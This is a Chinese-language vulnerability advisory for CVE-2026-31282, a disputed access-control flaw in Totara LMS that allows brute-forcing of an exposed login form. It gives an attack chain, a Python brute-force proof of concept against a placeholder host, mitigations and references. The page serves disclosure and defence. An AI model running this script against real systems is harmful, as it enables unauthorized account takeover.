CVE-2026-31282 CVSS 9.8 严重

CVE-2026-31282 Totara LMS访问控制缺陷导致暴力破解

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31282

漏洞类型

访问控制缺陷

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totara LMS

漏洞概述

Totara LMS v19.1.5及更早版本存在不正确的访问控制漏洞。由于登录页面代码可被操纵以显示登录表单，且该表单缺乏速率限制保护，攻击者可利用此缺陷发起暴力破解攻击。尽管供应商对此存在争议，声称该控制由服务端主导且无法绕过SSO，但该漏洞仍被标记为严重风险，可能导致未经授权的账户访问。

技术细节

该漏洞的核心在于Totara LMS的访问控制逻辑存在缺陷。攻击者能够通过特定手段操纵登录页面的前端代码或请求逻辑，强制暴露出本应隐藏或受SSO保护的本地登录表单。一旦暴露，由于系统未对该登录接口实施有效的速率限制机制，攻击者可以无阻碍地发送大量认证请求。结合用户名枚举或常见密码字典，攻击者能够实施高效的暴力破解攻击。虽然供应商辩称本地登录由服务器端严格控制，不存在绕过SSO的证据，但该逻辑漏洞若与配置错误结合，将极大降低攻击者的门槛，严重威胁系统身份认证的安全性。

攻击链分析

STEP 1

侦察与识别

攻击者识别目标Totara LMS系统，确认其版本在v19.1.5及以下。

STEP 2

操纵访问控制

攻击者通过修改前端代码或特定请求参数，绕过界面限制，强制暴露出本地登录表单。

STEP 3

暴力破解攻击

利用登录表单缺乏速率限制的缺陷，使用自动化脚本对用户账户进行大规模密码尝试。

STEP 4

获取访问权限

一旦猜测到正确密码，攻击者即可成功登录并获取用户账户的完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable Totara LMS instance
target_url = "http://target-totara-lms/login/index.php"
username = "admin"
wordlist = ["password123", "admin123", "123456", "totora"]

# Headers to mimic a legitimate browser request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
}

print(f"[*] Starting brute force attack on {target_url} for user: {username}")

for password in wordlist:
    # Payload data to manipulate the login form submission
    payload = {
        "username": username,
        "password": password
    }
    
    try:
        # Send POST request to the login endpoint
        response = requests.post(target_url, data=payload, headers=headers, allow_redirects=False)
        
        # Check for successful login indicators (e.g., 302 Redirect to dashboard or specific cookies)
        if response.status_code == 303 or "MoodleSession" in response.cookies:
            print(f"[+] SUCCESS! Password found: {password}")
            break
        else:
            print(f"[-] Failed attempt: {password}")
            
    except requests.RequestException as e:
        print(f"[!] Error occurred: {e}")

print("[*] Attack completed.")

影响范围

Totara LMS <= 19.1.5

防御指南

临时缓解措施

建议立即检查服务器端配置，确认本地登录功能的状态。若仅使用SSO，确保服务器端已彻底禁用本地登录入口。同时，在WAF或应用层配置严格的登录频率限制策略，防止暴力破解尝试。在未修复前，强制启用多因素认证（MFA）是缓解账户被接管风险的最有效手段。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-31282
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-31282
3 Details https://www.cvedetails.com/cve/CVE-2026-31282/
4 VulDB https://vuldb.com/cve/CVE-2026-31282
5 Link https://github.com/saykino/CVE-2026-31282
6 Link https://www.totara.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表